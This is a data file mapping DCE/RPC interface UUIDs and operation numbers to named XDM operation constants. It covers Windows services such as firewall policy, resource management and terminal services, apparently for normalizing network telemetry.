481e06cf-ab04-4498-8ffe-124a0a34296d:10 XDM_CONST.DCERPC_OPERATION_DELETE_CALENDAR
481e06cf-ab04-4498-8ffe-124a0a34296d:11 XDM_CONST.DCERPC_OPERATION_RENAME_CALENDAR
481e06cf-ab04-4498-8ffe-124a0a34296d:12 XDM_CONST.DCERPC_OPERATION_COMPUTE_EVENTS
481e06cf-ab04-4498-8ffe-124a0a34296d:13 XDM_CONST.DCERPC_OPERATION_GET_SCHEDULE_INFO
481e06cf-ab04-4498-8ffe-124a0a34296d:14 XDM_CONST.DCERPC_OPERATION_CREATE_SCHEDULE
481e06cf-ab04-4498-8ffe-124a0a34296d:15 XDM_CONST.DCERPC_OPERATION_MODIFY_SCHEDULE
481e06cf-ab04-4498-8ffe-124a0a34296d:16 XDM_CONST.DCERPC_OPERATION_DELETE_SCHEDULE
481e06cf-ab04-4498-8ffe-124a0a34296d:17 XDM_CONST.DCERPC_OPERATION_RENAME_SCHEDULE
481e06cf-ab04-4498-8ffe-124a0a34296d:18 XDM_CONST.DCERPC_OPERATION_MOVE_BEFORE_CALENDAR
481e06cf-ab04-4498-8ffe-124a0a34296d:19 XDM_CONST.DCERPC_OPERATION_MOVE_AFTER_CALENDAR
481e06cf-ab04-4498-8ffe-124a0a34296d:20 XDM_CONST.DCERPC_OPERATION_GET_SERVER_TIME_ZONE
21546ae8-4da5-445e-987f-627fea39c5e8:7 XDM_CONST.DCERPC_OPERATION_GET_CONFIG
21546ae8-4da5-445e-987f-627fea39c5e8:8 XDM_CONST.DCERPC_OPERATION_SET_CONFIG
21546ae8-4da5-445e-987f-627fea39c5e8:9 XDM_CONST.DCERPC_OPERATION_IS_ENABLED
21546ae8-4da5-445e-987f-627fea39c5e8:10 XDM_CONST.DCERPC_OPERATION_ENABLE_DISABLE
21546ae8-4da5-445e-987f-627fea39c5e8:11 XDM_CONST.DCERPC_OPERATION_GET_EXCLUSION_LIST
21546ae8-4da5-445e-987f-627fea39c5e8:12 XDM_CONST.DCERPC_OPERATION_SET_EXCLUSION_LIST
21546ae8-4da5-445e-987f-627fea39c5e8:13 XDM_CONST.DCERPC_OPERATION_WSRM_ACTIVATE
21546ae8-4da5-445e-987f-627fea39c5e8:14 XDM_CONST.DCERPC_OPERATION_IS_WSRM_ACTIVATED
21546ae8-4da5-445e-987f-627fea39c5e8:15 XDM_CONST.DCERPC_OPERATION_RESTORE_EXCLUSION_LIST
943991a5-b3fe-41fa-9696-7f7b656ee34b:7 XDM_CONST.DCERPC_OPERATION_CREATE_MACHINE_GROUP
943991a5-b3fe-41fa-9696-7f7b656ee34b:8 XDM_CONST.DCERPC_OPERATION_GET_MACHINE_GROUP_INFO
943991a5-b3fe-41fa-9696-7f7b656ee34b:9 XDM_CONST.DCERPC_OPERATION_MODIFY_MACHINE_GROUP
943991a5-b3fe-41fa-9696-7f7b656ee34b:10 XDM_CONST.DCERPC_OPERATION_DELETE_MACHINE_GROUP
943991a5-b3fe-41fa-9696-7f7b656ee34b:11 XDM_CONST.DCERPC_OPERATION_RENAME_MACHINE_GROUP
943991a5-b3fe-41fa-9696-7f7b656ee34b:12 XDM_CONST.DCERPC_OPERATION_ADD_MACHINE
943991a5-b3fe-41fa-9696-7f7b656ee34b:13 XDM_CONST.DCERPC_OPERATION_GET_MACHINE_INFO
943991a5-b3fe-41fa-9696-7f7b656ee34b:14 XDM_CONST.DCERPC_OPERATION_MODIFY_MACHINE_INFO
943991a5-b3fe-41fa-9696-7f7b656ee34b:15 XDM_CONST.DCERPC_OPERATION_DELETE_MACHINE
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:7 XDM_CONST.DCERPC_OPERATION_GET_POLICY_INFO
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:8 XDM_CONST.DCERPC_OPERATION_CREATE_POLICY
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:9 XDM_CONST.DCERPC_OPERATION_MODIFY_POLICY
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:10 XDM_CONST.DCERPC_OPERATION_DELETE_POLICY
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:11 XDM_CONST.DCERPC_OPERATION_RENAME_ALLOCATION_POLICY
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:12 XDM_CONST.DCERPC_OPERATION_MOVE_BEFORE
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:13 XDM_CONST.DCERPC_OPERATION_MOVE_AFTER
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:14 XDM_CONST.DCERPC_OPERATION_SET_CAL_DEFAULT_POLICY_NAME
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:15 XDM_CONST.DCERPC_OPERATION_GET_CAL_DEFAULT_POLICY_NAME
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:16 XDM_CONST.DCERPC_OPERATION_GET_PROCESS_LIST
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:17 XDM_CONST.DCERPC_OPERATION_GET_CURRENT_POLICY
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:18 XDM_CONST.DCERPC_OPERATION_SET_CURRENT_POLICY
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:19 XDM_CONST.DCERPC_OPERATION_GET_CURRENT_STATE_AND_ACTIVE_POLICY_NAME
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:20 XDM_CONST.DCERPC_OPERATION_GET_CONDITIONAL_POLICY
59602eb6-57b0-4fd8-aa4b-ebf06971fe15:21 XDM_CONST.DCERPC_OPERATION_SET_CONDITIONAL_POLICY
f31931a9-832d-481c-9503-887a0e6a79f0:7 XDM_CONST.DCERPC_OPERATION_GET_SUPPORTED_CLIENT
fc910418-55ca-45ef-b264-83d4ce7d30e0:7 XDM_CONST.DCERPC_OPERATION_GET_REMOTE_USER_CATEGORIES
fc910418-55ca-45ef-b264-83d4ce7d30e0:8 XDM_CONST.DCERPC_OPERATION_SET_REMOTE_USER_CATEGORIES
fc910418-55ca-45ef-b264-83d4ce7d30e0:9 XDM_CONST.DCERPC_OPERATION_REFRESH_REMOTE_SESSION_WEIGHTS
bc681469-9dd9-4bf4-9b3d-709f69efe431:7 XDM_CONST.DCERPC_OPERATION_GET_RESOURCE_GROUP_INFO
bc681469-9dd9-4bf4-9b3d-709f69efe431:8 XDM_CONST.DCERPC_OPERATION_MODIFY_RESOURCE_GROUP
bc681469-9dd9-4bf4-9b3d-709f69efe431:9 XDM_CONST.DCERPC_OPERATION_CREATE_RESOURCE_GROUP
bc681469-9dd9-4bf4-9b3d-709f69efe431:10 XDM_CONST.DCERPC_OPERATION_DELETE_RESOURCE_GROUP
bc681469-9dd9-4bf4-9b3d-709f69efe431:11 XDM_CONST.DCERPC_OPERATION_RENAME_RESOURCE_GROUP
e33c0cc4-0482-101a-bc0c-02608c6ba218:0 XDM_CONST.DCERPC_OPERATION_INSILOOKUPBEGIN
e33c0cc4-0482-101a-bc0c-02608c6ba218:1 XDM_CONST.DCERPC_OPERATION_INSILOOKUPDONE
e33c0cc4-0482-101a-bc0c-02608c6ba218:2 XDM_CONST.DCERPC_OPERATION_INSILOOKUPNEXT
e33c0cc4-0482-101a-bc0c-02608c6ba218:3 XDM_CONST.DCERPC_OPERATION_INSIENTRYOBJECTINQNEXT
e33c0cc4-0482-101a-bc0c-02608c6ba218:4 XDM_CONST.DCERPC_OPERATION_INSIPINGLOCATOR
e33c0cc4-0482-101a-bc0c-02608c6ba218:5 XDM_CONST.DCERPC_OPERATION_INSIENTRYOBJECTINQDONE
e33c0cc4-0482-101a-bc0c-02608c6ba218:6 XDM_CONST.DCERPC_OPERATION_INSIENTRYOBJECTINQBEGIN
afc07e2e-311c-4435-808c-c483ffeec7c9:0 XDM_CONST.DCERPC_OPERATION_LSAR_GET_AVAILABLE_CAPI_DS
22e5386d-8b12-4bf0-b0ec-6a1ea419e366:0 XDM_CONST.DCERPC_OPERATION_RPC_NET_EVENT_OPEN_SESSION
22e5386d-8b12-4bf0-b0ec-6a1ea419e366:1 XDM_CONST.DCERPC_OPERATION_RPC_NET_EVENT_RECEIVE_DATA
22e5386d-8b12-4bf0-b0ec-6a1ea419e366:2 XDM_CONST.DCERPC_OPERATION_RPC_NET_EVENT_CLOSE_SESSION
d049b186-814f-11d1-9a3c-00c04fc9b232:4 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_SET_DS_POLLING_INTERVAL_W
d049b186-814f-11d1-9a3c-00c04fc9b232:5 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_GET_DS_POLLING_INTERVAL_W
d049b186-814f-11d1-9a3c-00c04fc9b232:7 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_INFO_W
d049b186-814f-11d1-9a3c-00c04fc9b232:8 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_IS_PATH_REPLICATED
d049b186-814f-11d1-9a3c-00c04fc9b232:9 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_WRITER_COMMAND
d049b186-814f-11d1-9a3c-00c04fc9b232:10 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_FORCE_REPLICATION
497d95a6-2d27-4bf5-9bbd-a6046957133c:0 XDM_CONST.DCERPC_OPERATION_RPC_OPEN_LISTENER
497d95a6-2d27-4bf5-9bbd-a6046957133c:1 XDM_CONST.DCERPC_OPERATION_RPC_CLOSE_LISTENER
497d95a6-2d27-4bf5-9bbd-a6046957133c:2 XDM_CONST.DCERPC_OPERATION_RPC_STOP_LISTENER
497d95a6-2d27-4bf5-9bbd-a6046957133c:3 XDM_CONST.DCERPC_OPERATION_RPC_START_LISTENER
497d95a6-2d27-4bf5-9bbd-a6046957133c:4 XDM_CONST.DCERPC_OPERATION_RPC_IS_LISTENING
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:0 XDM_CONST.DCERPC_OPERATION_RPC_GET_CLIENT_DATA
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:1 XDM_CONST.DCERPC_OPERATION_RPC_GET_CONFIG_DATA
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:2 XDM_CONST.DCERPC_OPERATION_RPC_GET_PROTOCOL_STATUS
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:3 XDM_CONST.DCERPC_OPERATION_RPC_GET_LAST_INPUT_TIME
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:4 XDM_CONST.DCERPC_OPERATION_RPC_GET_REMOTE_ADDRESS
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:8 XDM_CONST.DCERPC_OPERATION_RPC_GET_ALL_LISTENERS
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:9 XDM_CONST.DCERPC_OPERATION_RPC_GET_SESSION_PROTOCOL_LAST_INPUT_TIME
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:10 XDM_CONST.DCERPC_OPERATION_RPC_GET_USER_CERTIFICATES
bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:11 XDM_CONST.DCERPC_OPERATION_RPC_QUERY_SESSION_DATA
6b5bdd1e-528c-422c-af8c-a4079be4fe48:0 XDM_CONST.DCERPC_OPERATION_RRPCFW_OPEN_POLICY_STORE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:1 XDM_CONST.DCERPC_OPERATION_RRPCFW_CLOSE_POLICY_STORE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:2 XDM_CONST.DCERPC_OPERATION_RRPCFW_RESTORE_DEFAULTS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:3 XDM_CONST.DCERPC_OPERATION_RRPCFW_GET_GLOBAL_CONFIG
6b5bdd1e-528c-422c-af8c-a4079be4fe48:4 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_GLOBAL_CONFIG
6b5bdd1e-528c-422c-af8c-a4079be4fe48:5 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:6 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:7 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_FIREWALL_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:8 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_ALL_FIREWALL_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:9 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:10 XDM_CONST.DCERPC_OPERATION_RRPCFW_GET_CONFIG
6b5bdd1e-528c-422c-af8c-a4079be4fe48:11 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CONFIG
6b5bdd1e-528c-422c-af8c-a4079be4fe48:12 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CONNECTION_SECURITY_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:13 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CONNECTION_SECURITY_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:14 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_CONNECTION_SECURITY_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:15 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CONNECTION_SECURITY_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:16 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CONNECTION_SECURITY_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:17 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_AUTHENTICATION_SET
6b5bdd1e-528c-422c-af8c-a4079be4fe48:18 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_AUTHENTICATION_SET
6b5bdd1e-528c-422c-af8c-a4079be4fe48:19 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_AUTHENTICATION_SET
6b5bdd1e-528c-422c-af8c-a4079be4fe48:20 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_ALL_AUTHENTICATION_SETS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:21 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_AUTHENTICATION_SETS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:22 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CRYPTO_SET
6b5bdd1e-528c-422c-af8c-a4079be4fe48:23 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CRYPTO_SET
6b5bdd1e-528c-422c-af8c-a4079be4fe48:24 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_CRYPTO_SET
6b5bdd1e-528c-422c-af8c-a4079be4fe48:25 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_ALL_CRYPTO_SETS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:26 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CRYPTO_SETS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:27 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_PHASE1_S_AS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:28 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_PHASE2_S_AS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:29 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_PHASE1_S_AS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:30 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_PHASE2_S_AS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:31 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_PRODUCTS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:32 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_MAIN_MODE_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:33 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_MAIN_MODE_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:34 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_MAIN_MODE_RULE
6b5bdd1e-528c-422c-af8c-a4079be4fe48:35 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_ALL_MAIN_MODE_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:36 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_MAIN_MODE_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:37 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:38 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_CONNECTION_SECURITY_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:39 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_MAIN_MODE_RULES
6b5bdd1e-528c-422c-af8c-a4079be4fe48:40 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_AUTHENTICATION_SETS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:41 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_CRYPTO_SETS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:42 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_NETWORKS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:43 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_ADAPTERS
6b5bdd1e-528c-422c-af8c-a4079be4fe48:44 XDM_CONST.DCERPC_OPERATION_RRPCFW_GET_GLOBAL_CONFIG210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:45 XDM_CONST.DCERPC_OPERATION_RRPCFW_GET_CONFIG210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:46 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:47 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:48 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:49 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CONNECTION_SECURITY_RULE210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:50 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CONNECTION_SECURITY_RULE210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:51 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CONNECTION_SECURITY_RULES210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:52 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_AUTHENTICATION_SET210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:53 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_AUTHENTICATION_SET210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:54 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_AUTHENTICATION_SETS210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:55 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CRYPTO_SET210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:56 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CRYPTO_SET210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:57 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CRYPTO_SETS210
6b5bdd1e-528c-422c-af8c-a4079be4fe48:58 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CONNECTION_SECURITY_RULE220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:59 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CONNECTION_SECURITY_RULE220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:60 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CONNECTION_SECURITY_RULES220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:61 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_CONNECTION_SECURITY_RULES220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:62 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_AUTHENTICATION_SET220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:63 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_AUTHENTICATION_SETS220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:64 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_AUTHENTICATION_SETS220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:65 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:66 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:67 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:69 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES220
6b5bdd1e-528c-422c-af8c-a4079be4fe48:70 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE224
6b5bdd1e-528c-422c-af8c-a4079be4fe48:71 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE224
6b5bdd1e-528c-422c-af8c-a4079be4fe48:72 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES224
6b5bdd1e-528c-422c-af8c-a4079be4fe48:73 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES224
6b5bdd1e-528c-422c-af8c-a4079be4fe48:74 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE225
6b5bdd1e-528c-422c-af8c-a4079be4fe48:75 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE225
6b5bdd1e-528c-422c-af8c-a4079be4fe48:76 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES225
6b5bdd1e-528c-422c-af8c-a4079be4fe48:77 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES225
6b5bdd1e-528c-422c-af8c-a4079be4fe48:78 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE226
6b5bdd1e-528c-422c-af8c-a4079be4fe48:79 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE226
6b5bdd1e-528c-422c-af8c-a4079be4fe48:80 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES226
6b5bdd1e-528c-422c-af8c-a4079be4fe48:81 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES226
2f5f6521-ca47-1068-b319-00dd010662db:0 XDM_CONST.DCERPC_OPERATION_REMOTE_SP_ATTACH
2f5f6521-ca47-1068-b319-00dd010662db:1 XDM_CONST.DCERPC_OPERATION_REMOTE_SP_EVENT_PROC
2f5f6521-ca47-1068-b319-00dd010662db:2 XDM_CONST.DCERPC_OPERATION_REMOTE_SP_DETACH
1257b580-ce2f-4109-82d6-a9459d0bf6bc:0 XDM_CONST.DCERPC_OPERATION_RPC_SHADOW2
4b112204-0e19-11d3-b42b-0000f81feb9f:0 XDM_CONST.DCERPC_OPERATION_REGISTER_SERVICE_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:1 XDM_CONST.DCERPC_OPERATION_DEREGISTER_SERVICE_RPC_BY_USN
4b112204-0e19-11d3-b42b-0000f81feb9f:2 XDM_CONST.DCERPC_OPERATION_DEREGISTER_SERVICE_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:3 XDM_CONST.DCERPC_OPERATION_UPDATE_CACHE_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:4 XDM_CONST.DCERPC_OPERATION_LOOKUP_CACHE_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:5 XDM_CONST.DCERPC_OPERATION_CLEANUP_CACHE_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:6 XDM_CONST.DCERPC_OPERATION_INITIALIZE_SYNC_HANDLE
4b112204-0e19-11d3-b42b-0000f81feb9f:7 XDM_CONST.DCERPC_OPERATION_REMOVE_SYNC_HANDLE
4b112204-0e19-11d3-b42b-0000f81feb9f:8 XDM_CONST.DCERPC_OPERATION_REGISTER_NOTIFICATION_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:9 XDM_CONST.DCERPC_OPERATION_GET_NOTIFICATION_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:10 XDM_CONST.DCERPC_OPERATION_WAKEUP_GET_NOTIFICATION_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:11 XDM_CONST.DCERPC_OPERATION_DEREGISTER_NOTIFICATION_RPC
4b112204-0e19-11d3-b42b-0000f81feb9f:12 XDM_CONST.DCERPC_OPERATION_ENABLE_DEVICE_HOST
4b112204-0e19-11d3-b42b-0000f81feb9f:13 XDM_CONST.DCERPC_OPERATION_DISABLE_DEVICE_HOST
4b112204-0e19-11d3-b42b-0000f81feb9f:14 XDM_CONST.DCERPC_OPERATION_SET_ICS_INTERFACES
4b112204-0e19-11d3-b42b-0000f81feb9f:15 XDM_CONST.DCERPC_OPERATION_SET_ICS_OFF
2f5f6520-ca46-1067-b319-00dd010662da:0 XDM_CONST.DCERPC_OPERATION_CLIENT_ATTACH
2f5f6520-ca46-1067-b319-00dd010662da:1 XDM_CONST.DCERPC_OPERATION_CLIENT_REQUEST
2f5f6520-ca46-1067-b319-00dd010662da:2 XDM_CONST.DCERPC_OPERATION_CLIENT_DETACH
88143fd0-c28d-4b2b-8fef-8d882f6a9390:0 XDM_CONST.DCERPC_OPERATION_RPC_OPEN_ENUM
88143fd0-c28d-4b2b-8fef-8d882f6a9390:1 XDM_CONST.DCERPC_OPERATION_RPC_CLOSE_ENUM
88143fd0-c28d-4b2b-8fef-8d882f6a9390:2 XDM_CONST.DCERPC_OPERATION_RPC_FILTER_BY_STATE
88143fd0-c28d-4b2b-8fef-8d882f6a9390:3 XDM_CONST.DCERPC_OPERATION_RPC_FILTER_BY_CALLERS_NAME
88143fd0-c28d-4b2b-8fef-8d882f6a9390:4 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_ADD_FILTER
88143fd0-c28d-4b2b-8fef-8d882f6a9390:5 XDM_CONST.DCERPC_OPERATION_RPC_GET_ENUM_RESULT
88143fd0-c28d-4b2b-8fef-8d882f6a9390:6 XDM_CONST.DCERPC_OPERATION_RPC_FILTER_BY_SESSION_TYPE
88143fd0-c28d-4b2b-8fef-8d882f6a9390:8 XDM_CONST.DCERPC_OPERATION_RPC_GET_SESSION_IDS
88143fd0-c28d-4b2b-8fef-8d882f6a9390:9 XDM_CONST.DCERPC_OPERATION_RPC_GET_ENUM_RESULT_EX
88143fd0-c28d-4b2b-8fef-8d882f6a9390:10 XDM_CONST.DCERPC_OPERATION_RPC_GET_ALL_SESSIONS
88143fd0-c28d-4b2b-8fef-8d882f6a9390:11 XDM_CONST.DCERPC_OPERATION_RPC_GET_ALL_SESSIONS_EX
11899a43-2b68-4a76-92e3-a3d6ad8c26ce:0 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_FOR_SESSION_STATE
11899a43-2b68-4a76-92e3-a3d6ad8c26ce:1 XDM_CONST.DCERPC_OPERATION_RPC_REGISTER_ASYNC_NOTIFICATION
11899a43-2b68-4a76-92e3-a3d6ad8c26ce:2 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_ASYNC_NOTIFICATION
11899a43-2b68-4a76-92e3-a3d6ad8c26ce:3 XDM_CONST.DCERPC_OPERATION_RPC_UN_REGISTER_ASYNC_NOTIFICATION
484809d6-4239-471b-b5bc-61df8c23ac48:0 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_FOR_SESSION_STATE
484809d6-4239-471b-b5bc-61df8c23ac48:1 XDM_CONST.DCERPC_OPERATION_RPC_REGISTER_ASYNC_NOTIFICATION
484809d6-4239-471b-b5bc-61df8c23ac48:2 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_ASYNC_NOTIFICATION
484809d6-4239-471b-b5bc-61df8c23ac48:3 XDM_CONST.DCERPC_OPERATION_RPC_UN_REGISTER_ASYNC_NOTIFICATION
4da1c422-943d-11d1-acae-00c04fc2aa3f:0 XDM_CONST.DCERPC_OPERATION_LNK_SVR_MESSAGE
4da1c422-943d-11d1-acae-00c04fc2aa3f:1 XDM_CONST.DCERPC_OPERATION_LNK_SVR_MESSAGE_CALLBACK
300f3532-38cc-11d0-a3f0-0020af6b0add:12 XDM_CONST.DCERPC_OPERATION_LNK_SEARCH_MACHINE
44e265dd-7daf-42cd-8560-3cdb6e7a2729:1 XDM_CONST.DCERPC_OPERATION_TS_PROXY_CREATE_TUNNEL
44e265dd-7daf-42cd-8560-3cdb6e7a2729:2 XDM_CONST.DCERPC_OPERATION_TS_PROXY_AUTHORIZE_TUNNEL
44e265dd-7daf-42cd-8560-3cdb6e7a2729:3 XDM_CONST.DCERPC_OPERATION_TS_PROXY_MAKE_TUNNEL_CALL
44e265dd-7daf-42cd-8560-3cdb6e7a2729:4 XDM_CONST.DCERPC_OPERATION_TS_PROXY_CREATE_CHANNEL
44e265dd-7daf-42cd-8560-3cdb6e7a2729:6 XDM_CONST.DCERPC_OPERATION_TS_PROXY_CLOSE_CHANNEL
44e265dd-7daf-42cd-8560-3cdb6e7a2729:7 XDM_CONST.DCERPC_OPERATION_TS_PROXY_CLOSE_TUNNEL
